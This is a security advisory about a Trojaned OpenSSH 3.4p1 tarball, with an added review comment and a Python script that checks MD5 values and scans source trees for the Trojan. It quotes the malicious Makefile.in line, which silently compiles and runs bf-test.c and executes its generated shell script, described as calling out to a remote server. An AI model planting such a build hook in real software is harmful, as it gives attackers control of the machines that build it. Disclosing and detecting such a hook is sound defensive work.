A Trojaned version of the OpenSSH package has been found on the ftp.openbsd.org server. The Trojaned version allows remote attackers to completely compromise the security of the server running the Trojaned copy.
The information has been provided by Edwin Groothuis.
The following OpenSSH package found on ftp.openbsd.org (and probably all its mirrors now) has been found to be Trojaned:
The OpenBSD people have been informed about it (via email to firstname.lastname@example.org and via irc.openprojects.org/#openbsd).
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
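Review bot: build-time code execution in the added recipe line: `sh ./bf-test.out &` runs shell text generated by a binary that was compiled and executed one step earlier on the same line, and the leading `@` stops make from echoing any of it. Nothing in a compat library's Makefile should execute generated output, so this line should be removed, and a host where this tree was built should be treated as having run it under the building user's account.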
bf-test.c is nothing more than a wrapper that generates a shell script that compiles itself and tries to connect to a server running on 220.127.116.11:6667 (web.snsonline.net).
The following are links to sources of the malicious files:
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
This is the md5 checksum of the Trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
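As an added example (not code from the advisory or from the OpenSSH project), the Python below checks a downloaded tarball against the two MD5 values above and scans an unpacked tree for the Makefile.in line and bf-test.c described earlier. The function names and result labels are assumptions made for illustration.

```python
import hashlib
import re
from pathlib import Path

# MD5 values quoted in the advisory for openssh-3.4p1.tar.gz.
KNOWN_GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"  # FreeBSD ports copy
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"    # Trojaned copy

# The recipe line the advisory reports in openbsd-compat/Makefile.in.
BF_TEST_RECIPE = re.compile(
    r"\$\(CC\)\s+bf-test\.c\b.*\bsh\s+\./bf-test\.out")


def md5_of(path, chunk=1 << 16):
    """Hash a file in chunks so large tarballs are not read into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def classify_digest(digest):
    """Compare a hex MD5 against the two values from the advisory."""
    digest = digest.strip().lower()
    if digest == TROJANED_MD5:
        return "trojaned"
    if digest == KNOWN_GOOD_MD5:
        return "matches-ports"
    # Neither value: not cleared, just not one of the two known copies.
    return "unknown"


def scan_tree(root):
    """List Trojan indicators in an unpacked openssh-3.4p1 source tree."""
    findings = []
    compat = Path(root) / "openbsd-compat"
    makefile = compat / "Makefile.in"
    if makefile.is_file():
        lines = makefile.read_text(errors="replace").splitlines()
        for number, line in enumerate(lines, 1):
            if BF_TEST_RECIPE.search(line):
                findings.append(f"{makefile}:{number}: runs bf-test output")
    # bf-test.c is the wrapper source the advisory describes.
    if (compat / "bf-test.c").is_file():
        findings.append(f"{compat / 'bf-test.c'}: Trojan wrapper source")
    return findings
```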